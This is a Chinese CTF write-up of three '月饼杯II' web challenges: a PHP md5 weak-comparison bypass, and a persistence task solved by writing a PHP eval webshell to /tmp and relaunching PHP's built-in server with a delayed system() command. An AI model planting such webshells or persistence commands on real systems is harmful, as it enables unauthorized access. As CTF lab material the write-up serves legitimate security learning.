当前位置: 首页 > news >正文

月饼杯II

web签到


<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {echo "小伙子不错嘛!!flag给你了:" . $flag;} else {echo "偶吼,带黑阔被窝抓到了!!!!";}
}

这题和月饼杯1的第二题有点像,那个是md2,这个是md5,思想都是一样的利用php弱比较的特性,突然想起QNKCDZO这个md5之后是0e开头的,但是这里不行!之后还是老是的用脚本爆破吧0e215962017这个就可以!

eztp

thinkphp不会拖着!

不要离开我

<?php
// 题目说明:
// 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['action'];
switch($a){case 'cmd':eval($_POST['cmd']);break;case 'check':file_get_contents("http://checker/api/check");break;default:die('params not validate');
}params not validate

试了会,发现直接提交check会关闭服务器!说是由于是www-data权限无法重新启动,但是可以利用php的内置web服务器!

使用-t参数指定目录提供服务!那么思路就是在/tmp这个目录下写入一句话木马,再启动这个内置web服务器,当然事先得先访问check,但是这里就有个点了,那么就是在check之后再启动内置web服务器,但是check之后会关闭主web服务器。我的想发是条件竞争,但是我并没有尝试,几乎渺茫,至于为啥留个思考的空间!

wp就使用了system("sleep 10 && php -S 0.0.0.0:80 -t /tmp");这个命令,然后在10秒内访问check使启动拥有flag,但是这其中应该也有猫腻,猜测是极少数的情况。所以这道题在我看了出的不是那么的好,但是也有学的知识!

exp

写马:cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");

启动:cmd=system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/");

10秒内访问check,然后再就可以getshell了!

mvp结算画面

http://www.dtcms.com/a/406621.html

相关文章:

  • OpenHarmony位置服务模块架构设计
  • 河南制作网站国外wordpress主题
  • C# WPF DataGrid 数据绑定时的单元格编辑类型模板
  • 天津微网站做年报的网站
  • Marin说PCB之POC电路layout设计仿真案例---13
  • 随堂笔记2025-925
  • 龙岩建网站wordpress php7 500
  • 阿里云 iis 多个网站建筑公司资质
  • Python读取MongoDB的JSON字典和列表对象转为字符串
  • 论证框架的四个核心问题(概念界定/基础理论/研究模型/研究假设)的因果链
  • IO流与网络编程
  • 案例18-新增搜索留言功能
  • Codeforces Round 1047 (Div. 3) F题题解记录
  • 基于 Redis 的分布式锁
  • 郑州视频网站建设wordpress登录去不了后台
  • 淮安做网站杨凯企业建站官网运营
  • django 使用绑定多个数据库实现数据的同步
  • 面试复习题---Android技术专家3
  • 云手机与人工智能之间的关系
  • 做网站对电脑要求高吗荆州市住房和城乡建设厅官方网站
  • Python 高效实现 PDF 转 Word:告别手动复制粘贴
  • 9.9元奶茶项目:matlab+FPGA的cordic算法(向量模式)计算相位角
  • 广州越秀公司网站建设电子商务基础网站建设与维护单项选择题
  • 网站技术培训学校世界知名网站
  • 专业做消防工程师的正规网站做网站百度推广多少钱
  • mysql的 启动 与 客户端连接
  • 【星海出品】rabbitMQ队列处理深入研究
  • Mysql常见八股文
  • 社交类网站开发需求怎么做个人网页
  • 解析01背包